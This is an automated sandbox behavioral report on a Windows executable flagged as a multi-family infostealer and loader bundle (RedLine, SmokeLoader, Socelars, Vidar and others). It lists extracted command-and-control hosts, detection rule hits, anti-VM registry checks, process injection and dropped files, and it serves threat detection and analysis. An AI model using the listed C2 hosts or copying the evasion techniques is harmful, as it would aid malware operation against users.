Behavioral Report

Target

022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
Size

403KB
MD5

f957e397e71010885b67f2afe37d8161
SHA1

a8bf84b971b37ac6e7f66c5e5a7e971a7741401e
SHA256

022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66
SHA512

8b5e9cb926fafc295c403c1fce7aa883db3a327e58c3295e9a081a8937bed28e305cca08c2c7d98080818095ea99bb4047e10aa2f61e3e4d6d965aef6d16a4f6

Score

10^/10

arkei gozi_ifsb redline smokeloader socelars vidar backdoor banker discovery evasion infostealer spyware stealer suricata themida trojan vmprotect

Malware Config

Extracted

Family	socelars
C2	http://www.hhgenice.top/ http://www.hhgenice.top/

Extracted

Family	redline
C2	tatreriash.xyz:80 tatreriash.xyz:80

Extracted

Family	smokeloader
Version	2020
C2	http://nalirou70.top/ http://xacokuo80.top/ http://nalirou70.top/ http://xacokuo80.top/
rc4.i32
rc4.i32

Signatures

Arkei
Arkei is an infostealer written in C++.
stealer arkei
Gozi, Gozi IFSB
Gozi ISFB is a well-known and widely distributed banking trojan.
banker trojan gozi_ifsb
Modifies Windows Defender Real-time Protection settings ⋅ 3 TTPs
evasion trojan

TTPs:

Modify Registry Modify Existing Service Disabling Security Tools
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
RedLine Payload ⋅ 1 IoCs

Processes:

resource yara_rule

behavioral2/memory/5324-307-0x0000000000360000-0x0000000000380000-memory.dmp family_redline
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars
Socelars Payload ⋅ 2 IoCs

Processes:

resource yara_rule

behavioral2/files/0x00040000000002c6-167.dat family_socelars
behavioral2/files/0x00040000000002c6-168.dat family_socelars

resource	yara_rule
behavioral2/memory/5324-307-0x0000000000360000-0x0000000000380000-memory.dmp	family_redline

resource	yara_rule
behavioral2/files/0x00040000000002c6-167.dat	family_socelars
behavioral2/files/0x00040000000002c6-168.dat	family_socelars

Suspicious use of NtCreateProcessExOtherParentProcess ⋅ 6 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

description	pid	process	target process
PID 5352 created 5036	5352	WerFault.exe	kMCLvaZxUoL4ETDwWQqOc6MX.exe
PID 5676 created 2680	5676	WerFault.exe	tG94gZUleeBFo8SDyi6butFz.exe
PID 5584 created 4624	5584	WerFault.exe	6Gjg3NTuW9hb7SqYymgdkeKo.exe
PID 5948 created 768	5948	WerFault.exe	Conhost.exe
PID 6056 created 3184	6056	WerFault.exe	Conhost.exe
PID 2020 created 4492	2020	WerFault.exe	Up_EgQSePP1xxhPBvlLFqEqe.exe

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata
Arkei Stealer Payload ⋅ 1 IoCs
stealer

Processes:

resource yara_rule

behavioral2/memory/4196-367-0x0000000000690000-0x00000000006B1000-memory.dmp family_arkei
Identifies VirtualBox via ACPI registry values (likely anti-VM) ⋅ 2 TTPs
evasion

TTPs:

Query Registry Virtualization/Sandbox Evasion
Vidar Stealer ⋅ 1 IoCs
stealer

Processes:

resource yara_rule

behavioral2/memory/768-328-0x00000000022D0000-0x00000000023A5000-memory.dmp family_vidar
Downloads MZ/PE file

resource	yara_rule
behavioral2/memory/4196-367-0x0000000000690000-0x00000000006B1000-memory.dmp	family_arkei

resource	yara_rule
behavioral2/memory/768-328-0x00000000022D0000-0x00000000023A5000-memory.dmp	family_vidar

Executes dropped EXE ⋅ 28 IoCs

Processes:

jbA8_s3FlxHrMmUQPOwNJfp8.exe97tPLM1BD83QAkW3t_oh9ywr.exeUp_EgQSePP1xxhPBvlLFqEqe.exe6Gjg3NTuW9hb7SqYymgdkeKo.exetG94gZUleeBFo8SDyi6butFz.exeXMGMTu3eQAvQPR86eRMXlDO9.exeo6NHz5BzimLqOLMlh9XEgPbX.exeZvQmBbFSxCcYQP4fGiwTawkt.execTOmx3wyJ995falPyP_CHHr6.exeKdlTj_CCMiXvvrf22JrhXXT5.exeyJqr3GGVaG4To30s0MDWLG61.exewn6Tr5ouTTYnpiBNWaXIcaFu.exedsqTtt9nQpWwz1yYMBAEipS6.exeXATuOQAsPCyh5ifJCHUEKp4p.exeGn5a2G1hE46fGK_8y4mb1keQ.exekMCLvaZxUoL4ETDwWQqOc6MX.exe33CEtghZf4kJPxQoBSqEUgkF.execBHStp1tUjbmpWGPeFPixzx7.exeIDyIlZ0vcJMZmpFNQrobzffX.exeDJQTgMZwK7ZPTQPNMIvPAKa5.exeLPvnU5MCa7evfTEqGJQeEKaS.exeD9RJLCLd2f8688ZYCUxUkMQi.exeCf1aoIESdkQ91XunX7mxtiH7.executm3.exeiJ_zxQndnIcJiYyrXyCpQokM.exeGn5a2G1hE46fGK_8y4mb1keQ.exe2905016.exe8syYjhN1kDn7VeWxv1eGSMvd.exe

pid	process
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4752	97tPLM1BD83QAkW3t_oh9ywr.exe
4492	Up_EgQSePP1xxhPBvlLFqEqe.exe
4624	6Gjg3NTuW9hb7SqYymgdkeKo.exe
2680	tG94gZUleeBFo8SDyi6butFz.exe
1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
3944	o6NHz5BzimLqOLMlh9XEgPbX.exe
4400	ZvQmBbFSxCcYQP4fGiwTawkt.exe
768	cTOmx3wyJ995falPyP_CHHr6.exe
4640	KdlTj_CCMiXvvrf22JrhXXT5.exe
4936	yJqr3GGVaG4To30s0MDWLG61.exe
3736	wn6Tr5ouTTYnpiBNWaXIcaFu.exe
884	dsqTtt9nQpWwz1yYMBAEipS6.exe
2964	XATuOQAsPCyh5ifJCHUEKp4p.exe
3312	Gn5a2G1hE46fGK_8y4mb1keQ.exe
5036	kMCLvaZxUoL4ETDwWQqOc6MX.exe
4196	33CEtghZf4kJPxQoBSqEUgkF.exe
4532	cBHStp1tUjbmpWGPeFPixzx7.exe
4760	IDyIlZ0vcJMZmpFNQrobzffX.exe
2088	DJQTgMZwK7ZPTQPNMIvPAKa5.exe
4076	LPvnU5MCa7evfTEqGJQeEKaS.exe
2172	D9RJLCLd2f8688ZYCUxUkMQi.exe
3184	Cf1aoIESdkQ91XunX7mxtiH7.exe
1832	cutm3.exe
5364	iJ_zxQndnIcJiYyrXyCpQokM.exe
6048	Gn5a2G1hE46fGK_8y4mb1keQ.exe
6140	2905016.exe
5116	8syYjhN1kDn7VeWxv1eGSMvd.exe

Modifies Windows Firewall ⋅ 1 TTPs
evasion

TTPs:

Modify Existing Service

VMProtect packed file ⋅ 3 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
behavioral2/files/0x000d0000000002b3-207.dat	vmprotect
behavioral2/files/0x000d0000000002b3-206.dat	vmprotect
behavioral2/memory/4760-289-0x0000000140000000-0x0000000140FFB000-memory.dmp	vmprotect

Checks BIOS information in registry ⋅ 2 TTPs 12 IoCs

BIOS information is often read in order to detect sandboxing environments.

TTPs:

Query Registry System Information Discovery

Processes:

cBHStp1tUjbmpWGPeFPixzx7.exewn6Tr5ouTTYnpiBNWaXIcaFu.exedsqTtt9nQpWwz1yYMBAEipS6.exeUp_EgQSePP1xxhPBvlLFqEqe.exekMCLvaZxUoL4ETDwWQqOc6MX.exeyJqr3GGVaG4To30s0MDWLG61.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	cBHStp1tUjbmpWGPeFPixzx7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wn6Tr5ouTTYnpiBNWaXIcaFu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	wn6Tr5ouTTYnpiBNWaXIcaFu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	dsqTtt9nQpWwz1yYMBAEipS6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	dsqTtt9nQpWwz1yYMBAEipS6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Up_EgQSePP1xxhPBvlLFqEqe.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	kMCLvaZxUoL4ETDwWQqOc6MX.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	kMCLvaZxUoL4ETDwWQqOc6MX.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	cBHStp1tUjbmpWGPeFPixzx7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Up_EgQSePP1xxhPBvlLFqEqe.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	yJqr3GGVaG4To30s0MDWLG61.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	yJqr3GGVaG4To30s0MDWLG61.exe

Loads dropped DLL ⋅ 2 IoCs

Processes:

iJ_zxQndnIcJiYyrXyCpQokM.exe

pid process

5364 iJ_zxQndnIcJiYyrXyCpQokM.exe
5364 iJ_zxQndnIcJiYyrXyCpQokM.exe
Reads user/profile data of web browsers ⋅ 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

TTPs:

Data from Local System Credentials in Files

pid	process
5364	iJ_zxQndnIcJiYyrXyCpQokM.exe
5364	iJ_zxQndnIcJiYyrXyCpQokM.exe

Themida packer ⋅ 10 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral2/files/0x000500000000c300-186.dat	themida
behavioral2/files/0x000700000000c8df-189.dat	themida
behavioral2/files/0x0003000000009c70-188.dat	themida
behavioral2/files/0x000300000001e5e7-205.dat	themida
behavioral2/memory/4936-253-0x0000000000B30000-0x0000000000B31000-memory.dmp	themida
behavioral2/memory/3736-272-0x0000000000DB0000-0x0000000000DB1000-memory.dmp	themida
behavioral2/memory/4532-264-0x0000000000C20000-0x0000000000C21000-memory.dmp	themida
behavioral2/memory/884-341-0x0000000000900000-0x0000000000901000-memory.dmp	themida
behavioral2/files/0x000100000002b20c-412.dat	themida
behavioral2/files/0x000400000002b1fc-428.dat	themida

Checks installed software on the system ⋅ 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

TTPs:

Query Registry

Checks whether UAC is enabled ⋅ 1 TTPs 6 IoCs

evasion trojan

TTPs:

System Information Discovery

Processes:

yJqr3GGVaG4To30s0MDWLG61.exewn6Tr5ouTTYnpiBNWaXIcaFu.execBHStp1tUjbmpWGPeFPixzx7.exeUp_EgQSePP1xxhPBvlLFqEqe.exekMCLvaZxUoL4ETDwWQqOc6MX.exedsqTtt9nQpWwz1yYMBAEipS6.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	yJqr3GGVaG4To30s0MDWLG61.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	wn6Tr5ouTTYnpiBNWaXIcaFu.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cBHStp1tUjbmpWGPeFPixzx7.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Up_EgQSePP1xxhPBvlLFqEqe.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	kMCLvaZxUoL4ETDwWQqOc6MX.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	dsqTtt9nQpWwz1yYMBAEipS6.exe

Legitimate hosting services abused for malware hosting/C2 ⋅ 1 TTPs

TTPs:

Web Service
Looks up external IP address via web service ⋅ 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

107 ipinfo.io
107 ip-api.com
120 ipinfo.io
163 ipinfo.io
165 api.db-ip.com
167 api.db-ip.com
3 ipinfo.io
37 ipinfo.io
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Suspicious use of NtSetInformationThreadHideFromDebugger ⋅ 4 IoCs

Processes:

dsqTtt9nQpWwz1yYMBAEipS6.exeyJqr3GGVaG4To30s0MDWLG61.exewn6Tr5ouTTYnpiBNWaXIcaFu.execBHStp1tUjbmpWGPeFPixzx7.exe

pid process

884 dsqTtt9nQpWwz1yYMBAEipS6.exe
4936 yJqr3GGVaG4To30s0MDWLG61.exe
3736 wn6Tr5ouTTYnpiBNWaXIcaFu.exe
4532 cBHStp1tUjbmpWGPeFPixzx7.exe

flow	ioc
107	ipinfo.io
107	ip-api.com
120	ipinfo.io
163	ipinfo.io
165	api.db-ip.com
167	api.db-ip.com
3	ipinfo.io
37	ipinfo.io

pid	process
884	dsqTtt9nQpWwz1yYMBAEipS6.exe
4936	yJqr3GGVaG4To30s0MDWLG61.exe
3736	wn6Tr5ouTTYnpiBNWaXIcaFu.exe
4532	cBHStp1tUjbmpWGPeFPixzx7.exe

Suspicious use of SetThreadContext ⋅ 2 IoCs

Processes:

Up_EgQSePP1xxhPBvlLFqEqe.exeschtasks.exe

description	pid	process	target process
PID 4492 set thread context of 5324	4492	Up_EgQSePP1xxhPBvlLFqEqe.exe	AppLaunch.exe
PID 3312 set thread context of 6048	3312	schtasks.exe	Gn5a2G1hE46fGK_8y4mb1keQ.exe

Drops file in Program Files directory ⋅ 6 IoCs

Processes:

XATuOQAsPCyh5ifJCHUEKp4p.exeDJQTgMZwK7ZPTQPNMIvPAKa5.exe

description	ioc	process
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	XATuOQAsPCyh5ifJCHUEKp4p.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	XATuOQAsPCyh5ifJCHUEKp4p.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\cutm3.exe	DJQTgMZwK7ZPTQPNMIvPAKa5.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe	DJQTgMZwK7ZPTQPNMIvPAKa5.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\Uninstall.exe	DJQTgMZwK7ZPTQPNMIvPAKa5.exe
File created	C:\Program Files (x86)\Company\NewProduct\Uninstall.ini	DJQTgMZwK7ZPTQPNMIvPAKa5.exe

Drops file in Windows directory ⋅ 7 IoCs

Processes:

svchost.exeWerFault.exe

description	ioc	process
File opened for modification	C:\Windows\WindowsUpdate.log	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.edb	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\ReportingEvents.log	svchost.exe
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	WerFault.exe

Enumerates physical storage devices ⋅ 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

TTPs:

System Information Discovery

Program crash ⋅ 12 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
5968	2680	WerFault.exe	tG94gZUleeBFo8SDyi6butFz.exe
5832	5036	WerFault.exe	kMCLvaZxUoL4ETDwWQqOc6MX.exe
6084	4624	WerFault.exe	6Gjg3NTuW9hb7SqYymgdkeKo.exe
5440	768	WerFault.exe	cTOmx3wyJ995falPyP_CHHr6.exe
3204	1476	WerFault.exe	XMGMTu3eQAvQPR86eRMXlDO9.exe
6088	4752	WerFault.exe	97tPLM1BD83QAkW3t_oh9ywr.exe
6080	4076	WerFault.exe	LPvnU5MCa7evfTEqGJQeEKaS.exe
5804	4640	WerFault.exe	KdlTj_CCMiXvvrf22JrhXXT5.exe
4696	228	WerFault.exe	3064.exe
2156	2360	WerFault.exe	uwcqTvoJZyFzdwFOrgjLNk3L.exe
4172	4080	WerFault.exe	lOxrLkIZuQMAQx5v4HoaEB9b.exe
1560	5044	WerFault.exe	n0XA6WpRiv72ADyrBgNcyvZr.exe

NSIS installer ⋅ 4 IoCs

installer

Processes:

resource	yara_rule
behavioral2/files/0x000100000002b1c9-291.dat	nsis_installer_1
behavioral2/files/0x000100000002b1c9-291.dat	nsis_installer_2
behavioral2/files/0x000100000002b1c9-303.dat	nsis_installer_1
behavioral2/files/0x000100000002b1c9-303.dat	nsis_installer_2

Checks SCSI registry key(s) ⋅ 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

TTPs:

Query Registry Peripheral Device Discovery System Information Discovery

Processes:

Gn5a2G1hE46fGK_8y4mb1keQ.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Gn5a2G1hE46fGK_8y4mb1keQ.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Gn5a2G1hE46fGK_8y4mb1keQ.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Gn5a2G1hE46fGK_8y4mb1keQ.exe

Checks processor information in registry ⋅ 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

TTPs:

Query Registry System Information Discovery

Processes:

svchost.exe

description	ioc	process
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe

Creates scheduled task(s) ⋅ 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

TTPs:

Scheduled Task

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

5608 schtasks.exe
3792 schtasks.exe
3312 schtasks.exe
Kills process with taskkill ⋅ 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

104 taskkill.exe
3716 taskkill.exe
5772 taskkill.exe

pid	process
5608	schtasks.exe
3792	schtasks.exe
3312	schtasks.exe

pid	process
104	taskkill.exe
3716	taskkill.exe
5772	taskkill.exe

Suspicious behavior: EnumeratesProcesses ⋅ 64 IoCs

Processes:

022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exejbA8_s3FlxHrMmUQPOwNJfp8.exe

pid	process
1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe

Suspicious use of AdjustPrivilegeToken ⋅ 46 IoCs

Processes:

svchost.exesvchost.exeXMGMTu3eQAvQPR86eRMXlDO9.exeo6NHz5BzimLqOLMlh9XEgPbX.exeWerFault.exe

description	pid	process
Token: SeShutdownPrivilege	2412	svchost.exe
Token: SeCreatePagefilePrivilege	2412	svchost.exe
Token: SeShutdownPrivilege	2412	svchost.exe
Token: SeCreatePagefilePrivilege	2412	svchost.exe
Token: SeShutdownPrivilege	2412	svchost.exe
Token: SeCreatePagefilePrivilege	2412	svchost.exe
Token: SeShutdownPrivilege	1408	svchost.exe
Token: SeCreatePagefilePrivilege	1408	svchost.exe
Token: SeCreateTokenPrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeAssignPrimaryTokenPrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeLockMemoryPrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeIncreaseQuotaPrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeMachineAccountPrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeTcbPrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeSecurityPrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeTakeOwnershipPrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeLoadDriverPrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeSystemProfilePrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeSystemtimePrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeProfSingleProcessPrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeIncBasePriorityPrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeCreatePagefilePrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeCreatePermanentPrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeBackupPrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeRestorePrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeShutdownPrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeDebugPrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeAuditPrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeSystemEnvironmentPrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeChangeNotifyPrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeRemoteShutdownPrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeUndockPrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeSyncAgentPrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeEnableDelegationPrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeManageVolumePrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeImpersonatePrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeCreateGlobalPrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: 31	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: 32	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: 33	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: 34	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: 35	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeDebugPrivilege	3944	o6NHz5BzimLqOLMlh9XEgPbX.exe
Token: SeRestorePrivilege	5832	WerFault.exe
Token: SeBackupPrivilege	5832	WerFault.exe
Token: SeBackupPrivilege	5832	WerFault.exe

Suspicious use of WriteProcessMemory ⋅ 64 IoCs

Processes:

svchost.exe022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe

description	pid	process	target process
PID 1408 wrote to memory of 5092	1408	svchost.exe	MoUsoCoreWorker.exe
PID 1408 wrote to memory of 5092	1408	svchost.exe	MoUsoCoreWorker.exe
PID 1436 wrote to memory of 4728	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	jbA8_s3FlxHrMmUQPOwNJfp8.exe
PID 1436 wrote to memory of 4728	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	jbA8_s3FlxHrMmUQPOwNJfp8.exe
PID 1436 wrote to memory of 4752	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	97tPLM1BD83QAkW3t_oh9ywr.exe
PID 1436 wrote to memory of 4752	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	97tPLM1BD83QAkW3t_oh9ywr.exe
PID 1436 wrote to memory of 4752	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	97tPLM1BD83QAkW3t_oh9ywr.exe
PID 1436 wrote to memory of 4492	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	Up_EgQSePP1xxhPBvlLFqEqe.exe
PID 1436 wrote to memory of 4492	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	Up_EgQSePP1xxhPBvlLFqEqe.exe
PID 1436 wrote to memory of 4492	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	Up_EgQSePP1xxhPBvlLFqEqe.exe
PID 1436 wrote to memory of 4624	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	6Gjg3NTuW9hb7SqYymgdkeKo.exe
PID 1436 wrote to memory of 4624	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	6Gjg3NTuW9hb7SqYymgdkeKo.exe
PID 1436 wrote to memory of 4624	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	6Gjg3NTuW9hb7SqYymgdkeKo.exe
